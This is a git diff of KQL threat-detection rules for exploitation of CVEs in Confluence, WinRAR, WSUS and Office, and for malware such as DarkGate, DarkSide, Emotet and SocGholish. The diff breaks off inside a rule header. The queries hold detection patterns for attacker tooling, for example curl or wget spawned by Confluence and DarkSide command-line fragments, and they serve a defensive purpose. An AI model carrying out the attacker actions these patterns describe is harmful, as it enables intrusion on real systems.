-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-04-13
-// Level: high
-// Description: Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.privilege-escalation, attack.t1059.001, cve.2022-24527, detection.emerging-threats
-
-DeviceFileEvents
+// Title: CVE-2022-24527 Microsoft Connected Cache LPE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-13
+// Level: high
+// Description: Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.privilege-escalation, attack.t1059.001, cve.2022-24527, detection.emerging-threats
+
+DeviceFileEvents
 | where FolderPath endswith "WindowsPowerShell\\Modules\\webAdministration\\webAdministration.psm1" and (not((RequestAccountName contains "AUTHORI" or RequestAccountName contains "AUTORI")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql b/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql
index 1c519e6b..83901817 100644
--- a/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql
+++ b/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql
@@ -1,12 +1,12 @@
-// Title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)
-// Author: Andreas Braathen (mnemonic.io)
-// Date: 2023-11-14
-// Level: high
-// Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, cve.2023-22518, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-11-14
+// Level: high
+// Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, cve.2023-22518, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ((FolderPath endswith "/bash" or FolderPath endswith "/curl" or FolderPath endswith "/echo" or FolderPath endswith "/wget") and (InitiatingProcessCommandLine contains "confluence" and InitiatingProcessFolderPath endswith "/java")) and (not(ProcessCommandLine contains "ulimit -u"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql b/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql
index 6153f5d8..b6ff4139 100644
--- a/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql
+++ b/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql
@@ -1,10 +1,10 @@
-// Title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows)
-// Author: Andreas Braathen (mnemonic.io)
-// Date: 2023-11-14
-// Level: medium
-// Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, cve.2023-22518, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows)
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-11-14
+// Level: medium
+// Description: Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.initial-access, attack.t1190, cve.2023-22518, detection.emerging-threats
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE"))) and (InitiatingProcessCommandLine contains "confluence" and (InitiatingProcessFolderPath endswith "\\tomcat8.exe" or InitiatingProcessFolderPath endswith "\\tomcat9.exe" or InitiatingProcessFolderPath endswith "\\tomcat10.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql b/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql
index 6e14b751..cbc6e8f2 100644
--- a/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql
+++ b/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql
@@ -1,10 +1,10 @@
-// Title: CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-08-30
-// Level: high
-// Description: Detects the creation of a file with a double extension and a space by WinRAR. This could be a sign of exploitation of CVE-2023-38331
-// MITRE Tactic: Execution
-// Tags: attack.execution, cve.2023-38331, detection.emerging-threats
-
-DeviceFileEvents
+// Title: CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-30
+// Level: high
+// Description: Detects the creation of a file with a double extension and a space by WinRAR. This could be a sign of exploitation of CVE-2023-38331
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2023-38331, detection.emerging-threats
+
+DeviceFileEvents
 | where InitiatingProcessFolderPath endswith "\\WinRAR.exe" and FolderPath contains "\\AppData\\Local\\Temp\\Rar$" and FolderPath matches regex "\\.[a-zA-Z0-9]{1,4} \\."
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql b/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql
index 58192dc0..894b4988 100644
--- a/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql
+++ b/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql
@@ -1,12 +1,12 @@
-// Title: CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process
-// Author: Nasreddine Bencherchali (Nextron Systems), Andreas Braathen (mnemonic.io)
-// Date: 2023-08-30
-// Level: high
-// Description: Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries.
-// MITRE Tactic: Execution
-// Tags: detection.emerging-threats, attack.execution, attack.t1203, cve.2023-38331
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process
+// Author: Nasreddine Bencherchali (Nextron Systems), Andreas Braathen (mnemonic.io)
+// Date: 2023-08-30
+// Level: high
+// Description: Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries.
+// MITRE Tactic: Execution
+// Tags: detection.emerging-threats, attack.execution, attack.t1203, cve.2023-38331
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "PowerShell.EXE", "pwsh.dll", "wscript.exe"))) and ProcessCommandLine matches regex "\\.[a-zA-Z0-9]{1,4} \\." and ProcessCommandLine contains "\\AppData\\Local\\Temp\\Rar$" and InitiatingProcessFolderPath endswith "\\WinRAR.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_40477_potential_exploitation_rev_file_creation.kql b/KQL/rules-emerging-threats/Execution/cve_2023_40477_potential_exploitation_rev_file_creation.kql
index 9c44e5c4..2bec633b 100644
--- a/KQL/rules-emerging-threats/Execution/cve_2023_40477_potential_exploitation_rev_file_creation.kql
+++ b/KQL/rules-emerging-threats/Execution/cve_2023_40477_potential_exploitation_rev_file_creation.kql
@@ -1,12 +1,12 @@
-// Title: CVE-2023-40477 Potential Exploitation - .REV File Creation
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-08-31
-// Level: low
-// Description: Detects the creation of ".rev" files by WinRAR. Could be indicative of potential exploitation of CVE-2023-40477. Look for a suspicious execution shortly after creation or a WinRAR application crash.
-// MITRE Tactic: Execution
-// Tags: attack.execution, cve.2023-40477, detection.emerging-threats
-// False Positives:
-// - Legitimate extraction of multipart or recovery volumes ZIP files
-
-DeviceFileEvents
+// Title: CVE-2023-40477 Potential Exploitation - .REV File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-31
+// Level: low
+// Description: Detects the creation of ".rev" files by WinRAR. Could be indicative of potential exploitation of CVE-2023-40477. Look for a suspicious execution shortly after creation or a WinRAR application crash.
+// MITRE Tactic: Execution
+// Tags: attack.execution, cve.2023-40477, detection.emerging-threats
+// False Positives:
+// - Legitimate extraction of multipart or recovery volumes ZIP files
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\WinRAR.exe") and FolderPath endswith ".rev"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql b/KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql
index ae1712b0..92b68a1a 100644
--- a/KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql
+++ b/KQL/rules-emerging-threats/Execution/darkgate_autoit3_exe_execution_parameters.kql
@@ -1,14 +1,14 @@
-// Title: DarkGate - Autoit3.EXE Execution Parameters
-// Author: Micah Babinski
-// Date: 2023-10-15
-// Level: high
-// Description: Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within
-// the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate
-// command-and-control server.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: DarkGate - Autoit3.EXE Execution Parameters
+// Author: Micah Babinski
+// Date: 2023-10-15
+// Level: high
+// Description: Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within
+// the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate
+// command-and-control server.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\KeyScramblerLogon.exe" or InitiatingProcessFolderPath endswith "\\msiexec.exe") and (FolderPath endswith "\\Autoit3.exe" or ProcessVersionInfoOriginalFileName =~ "AutoIt3.exe")) and (not((FolderPath endswith ":\\Program Files (x86)\\AutoIt3\\AutoIt3.exe" or FolderPath endswith ":\\Program Files\\AutoIt3\\AutoIt3.exe")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/darkgate_drop_darkgate_loader_in_c_temp_directory.kql b/KQL/rules-emerging-threats/Execution/darkgate_drop_darkgate_loader_in_c_temp_directory.kql
index 3f1f3a5c..75a2994d 100644
--- a/KQL/rules-emerging-threats/Execution/darkgate_drop_darkgate_loader_in_c_temp_directory.kql
+++ b/KQL/rules-emerging-threats/Execution/darkgate_drop_darkgate_loader_in_c_temp_directory.kql
@@ -1,12 +1,12 @@
-// Title: DarkGate - Drop DarkGate Loader In C:\Temp Directory
-// Author: Tomasz Dyduch, Josh Nickels
-// Date: 2024-05-31
-// Level: medium
-// Description: Detects attackers attempting to save, decrypt and execute the DarkGate Loader in C:\temp folder.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059, detection.emerging-threats
-// False Positives:
-// - Unlikely legitimate usage of AutoIT in temp folders.
-
-DeviceFileEvents
+// Title: DarkGate - Drop DarkGate Loader In C:\Temp Directory
+// Author: Tomasz Dyduch, Josh Nickels
+// Date: 2024-05-31
+// Level: medium
+// Description: Detects attackers attempting to save, decrypt and execute the DarkGate Loader in C:\temp folder.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, detection.emerging-threats
+// False Positives:
+// - Unlikely legitimate usage of AutoIT in temp folders.
+
+DeviceFileEvents
 | where (FolderPath contains ":\\temp\\" and (FolderPath endswith ".au3" or FolderPath endswith "\\autoit3.exe")) or (InitiatingProcessFolderPath contains ":\\temp\\" and (InitiatingProcessFolderPath endswith ".au3" or InitiatingProcessFolderPath endswith "\\autoit3.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/darkside_ransomware_pattern.kql b/KQL/rules-emerging-threats/Execution/darkside_ransomware_pattern.kql
index 06adb4ca..8096e68e 100644
--- a/KQL/rules-emerging-threats/Execution/darkside_ransomware_pattern.kql
+++ b/KQL/rules-emerging-threats/Execution/darkside_ransomware_pattern.kql
@@ -1,12 +1,12 @@
-// Title: DarkSide Ransomware Pattern
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-05-14
-// Level: critical
-// Description: Detects DarkSide Ransomware and helpers
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1204, detection.emerging-threats
-// False Positives:
-// - UAC bypass method used by other malware
-
-DeviceProcessEvents
+// Title: DarkSide Ransomware Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-05-14
+// Level: critical
+// Description: Detects DarkSide Ransomware and helpers
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204, detection.emerging-threats
+// False Positives:
+// - UAC bypass method used by other malware
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "=[char][byte]('0x'+" or ProcessCommandLine contains " -work worker0 -path ") or (FolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessCommandLine contains "DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_file_creation_indicators.kql b/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_file_creation_indicators.kql
index 3b087bd4..2ba18f53 100644
--- a/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_file_creation_indicators.kql
+++ b/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_file_creation_indicators.kql
@@ -1,12 +1,12 @@
-// Title: Diamond Sleet APT File Creation Indicators
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-10-24
-// Level: high
-// Description: Detects file creation activity that is related to Diamond Sleet APT activity
-// MITRE Tactic: Execution
-// Tags: attack.execution, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: Diamond Sleet APT File Creation Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-24
+// Level: high
+// Description: Detects file creation activity that is related to Diamond Sleet APT activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where FolderPath endswith ":\\ProgramData\\4800-84DC-063A6A41C5C" or FolderPath endswith ":\\ProgramData\\clip.exe" or FolderPath endswith ":\\ProgramData\\DSROLE.dll" or FolderPath endswith ":\\ProgramData\\Forest64.exe" or FolderPath endswith ":\\ProgramData\\readme.md" or FolderPath endswith ":\\ProgramData\\Version.dll" or FolderPath endswith ":\\ProgramData\\wsmprovhost.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_process_activity_indicators.kql b/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_process_activity_indicators.kql
index 62380147..c360500b 100644
--- a/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_process_activity_indicators.kql
+++ b/KQL/rules-emerging-threats/Execution/diamond_sleet_apt_process_activity_indicators.kql
@@ -1,12 +1,12 @@
-// Title: Diamond Sleet APT Process Activity Indicators
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-10-24
-// Level: high
-// Description: Detects process creation activity indicators related to Diamond Sleet APT
-// MITRE Tactic: Execution
-// Tags: attack.execution, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Diamond Sleet APT Process Activity Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-24
+// Level: high
+// Description: Detects process creation activity indicators related to Diamond Sleet APT
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " uTYNkfKxHiZrx3KJ"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/droppers_exploiting_cve_2017_11882.kql b/KQL/rules-emerging-threats/Execution/droppers_exploiting_cve_2017_11882.kql
index 64ec2a68..d9a4601f 100644
--- a/KQL/rules-emerging-threats/Execution/droppers_exploiting_cve_2017_11882.kql
+++ b/KQL/rules-emerging-threats/Execution/droppers_exploiting_cve_2017_11882.kql
@@ -1,10 +1,10 @@
-// Title: Droppers Exploiting CVE-2017-11882
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017-11-23
-// Level: critical
-// Description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1203, attack.t1204.002, attack.initial-access, attack.t1566.001, cve.2017-11882, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Droppers Exploiting CVE-2017-11882
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-11-23
+// Level: critical
+// Description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1203, attack.t1204.002, attack.initial-access, attack.t1566.001, cve.2017-11882, detection.emerging-threats
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/elise_backdoor_activity.kql b/KQL/rules-emerging-threats/Execution/elise_backdoor_activity.kql
index e6e47dcf..d96919dd 100644
--- a/KQL/rules-emerging-threats/Execution/elise_backdoor_activity.kql
+++ b/KQL/rules-emerging-threats/Execution/elise_backdoor_activity.kql
@@ -1,12 +1,12 @@
-// Title: Elise Backdoor Activity
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2018-01-31
-// Level: critical
-// Description: Detects Elise backdoor activity used by APT32
-// MITRE Tactic: Execution
-// Tags: attack.g0030, attack.g0050, attack.s0081, attack.execution, attack.t1059.003, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Elise Backdoor Activity
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2018-01-31
+// Level: critical
+// Description: Detects Elise backdoor activity used by APT32
+// MITRE Tactic: Execution
+// Tags: attack.g0030, attack.g0050, attack.s0081, attack.execution, attack.t1059.003, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "\\Windows\\Caches\\NavShExt.dll" and ProcessCommandLine contains "/c del") or FolderPath endswith "\\Microsoft\\Network\\svchost.exe") or (ProcessCommandLine contains ",Setting" and (ProcessCommandLine endswith "\\AppData\\Roaming\\MICROS~1\\Windows\\Caches\\NavShExt.dll" or ProcessCommandLine endswith "\\AppData\\Roaming\\Microsoft\\Windows\\Caches\\NavShExt.dll"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql b/KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql
index 35f50aec..82e4a93b 100644
--- a/KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql
+++ b/KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql
@@ -1,13 +1,13 @@
-// Title: Emotet Loader Execution Via .LNK File
-// Author: @kostastsale
-// Date: 2022-04-22
-// Level: high
-// Description: Detects the Emotet Epoch4 loader as reported by @malware_traffic back in 2022.
-// The ".lnk" file was delivered via phishing campaign.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.006, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Emotet Loader Execution Via .LNK File
+// Author: @kostastsale
+// Date: 2022-04-22
+// Level: high
+// Description: Detects the Emotet Epoch4 loader as reported by @malware_traffic back in 2022.
+// The ".lnk" file was delivered via phishing campaign.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.006, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "findstr" and ProcessCommandLine contains ".vbs" and ProcessCommandLine contains ".lnk") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_0261.kql b/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_0261.kql
index f24372fd..490fe1d9 100644
--- a/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_0261.kql
+++ b/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_0261.kql
@@ -1,12 +1,12 @@
-// Title: Exploit for CVE-2017-0261
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018-02-22
-// Level: medium
-// Description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1203, attack.t1204.002, attack.initial-access, attack.t1566.001, cve.2017-0261, detection.emerging-threats
-// False Positives:
-// - Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)
-
-DeviceProcessEvents
+// Title: Exploit for CVE-2017-0261
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-02-22
+// Level: medium
+// Description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1203, attack.t1204.002, attack.initial-access, attack.t1566.001, cve.2017-0261, detection.emerging-threats
+// False Positives:
+// - Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)
+
+DeviceProcessEvents
 | where FolderPath contains "\\FLTLDR.exe" and InitiatingProcessFolderPath endswith "\\WINWORD.EXE"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_8759.kql b/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_8759.kql
index cc1e35fb..9cd70a63 100644
--- a/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_8759.kql
+++ b/KQL/rules-emerging-threats/Execution/exploit_for_cve_2017_8759.kql
@@ -1,10 +1,10 @@
-// Title: Exploit for CVE-2017-8759
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017-09-15
-// Level: critical
-// Description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1203, attack.t1204.002, attack.initial-access, attack.t1566.001, cve.2017-8759, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Exploit for CVE-2017-8759
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-09-15
+// Level: critical
+// Description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1203, attack.t1204.002, attack.initial-access, attack.t1566.001, cve.2017-8759, detection.emerging-threats
+
+DeviceProcessEvents
 | where FolderPath endswith "\\csc.exe" and InitiatingProcessFolderPath endswith "\\WINWORD.EXE"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql b/KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql
index 142431b5..08ee0c7b 100644
--- a/KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql
+++ b/KQL/rules-emerging-threats/Execution/exploitation_activity_of_cve_2025_59287_wsus_suspicious_child_process.kql
@@ -1,13 +1,13 @@
-// Title: Exploitation Activity of CVE-2025-59287 - WSUS Suspicious Child Process
-// Author: Huntress Labs, Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-10-31
-// Level: high
-// Description: Detects the creation of command-line interpreters (cmd.exe, powershell.exe) as child processes of Windows Server Update Services (WSUS) related process wsusservice.exe.
-// This behavior is a key indicator of exploitation for the critical remote code execution vulnerability such as CVE-2025-59287, where attackers spawn shells to conduct reconnaissance and further post-exploitation activities.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.initial-access, attack.t1190, attack.t1203, cve.2025-59287, detection.emerging-threats
-// False Positives:
-// - If this activity is expected, consider filtering based on specific command lines, user context (e.g., `nt authority\network service`), or parent process command lines to reduce noise.
-
-DeviceProcessEvents
+// Title: Exploitation Activity of CVE-2025-59287 - WSUS Suspicious Child Process
+// Author: Huntress Labs, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-31
+// Level: high
+// Description: Detects the creation of command-line interpreters (cmd.exe, powershell.exe) as child processes of Windows Server Update Services (WSUS) related process wsusservice.exe.
+// This behavior is a key indicator of exploitation for the critical remote code execution vulnerability such as CVE-2025-59287, where attackers spawn shells to conduct reconnaissance and further post-exploitation activities.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.initial-access, attack.t1190, attack.t1203, cve.2025-59287, detection.emerging-threats
+// False Positives:
+// - If this activity is expected, consider filtering based on specific command lines, user context (e.g., `nt authority\network service`), or parent process command lines to reduce noise.
+
+DeviceProcessEvents
 | where ((InitiatingProcessCommandLine contains "WsusPool" and InitiatingProcessFolderPath endswith "\\w3wp.exe") or InitiatingProcessFolderPath endswith "\\wsusservice.exe") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\powershell_ise.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql b/KQL/rules-emerging-threats/Execution/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql
index eab81083..2db1b864 100644
--- a/KQL/rules-emerging-threats/Execution/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql
+++ b/KQL/rules-emerging-threats/Execution/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql
@@ -1,10 +1,10 @@
-// Title: Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC
-// Author: @Kostastsale, TheDFIRReport
-// Date: 2022-02-12
-// Level: high
-// Description: Detects the execution of the commonly used ZeroLogon PoC executable.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.lateral-movement, attack.t1210, cve.2020-1472, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC
+// Author: @Kostastsale, TheDFIRReport
+// Date: 2022-02-12
+// Level: high
+// Description: Detects the execution of the commonly used ZeroLogon PoC executable.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1210, cve.2020-1472, detection.emerging-threats
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "Administrator" and ProcessCommandLine contains "-c") and (FolderPath endswith "\\cool.exe" or FolderPath endswith "\\zero.exe") and InitiatingProcessFolderPath endswith "\\cmd.exe") and ((ProcessCommandLine contains "taskkill" and ProcessCommandLine contains "/f" and ProcessCommandLine contains "/im") or ProcessCommandLine contains "powershell")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Execution/fakeupdates_socgholish_activity.kql b/KQL/rules-emerging-threats/Execution/fakeupdates_socgholish_activity.kql
index 8207429f..d809f987 100644
--- a/KQL/rules-emerging-threats/Execution/fakeupdates_socgholish_activity.kql
+++ b/KQL/rules-emerging-threats/Execution/fakeupdates_socgholish_activity.kql
@@ -1,12 +1,12 @@
-// Title: FakeUpdates/SocGholish Activity
-// Author: @kostastsale
-// Date: 2022-06-16
-// Level: high
-// Description: Detects initial execution of FakeUpdates/SocGholish malware via wscript that later executes commands via cmd or powershell.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: FakeUpdates/SocGholish Activity
+// Author: @kostastsale
+// Date: 2022-06-16
+// Level: high
+// Description: Detects initial execution of FakeUpdates/SocGholish malware via wscript that later executes commands via cmd or powershell.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, detection.emerging-threats
+// False Positives:
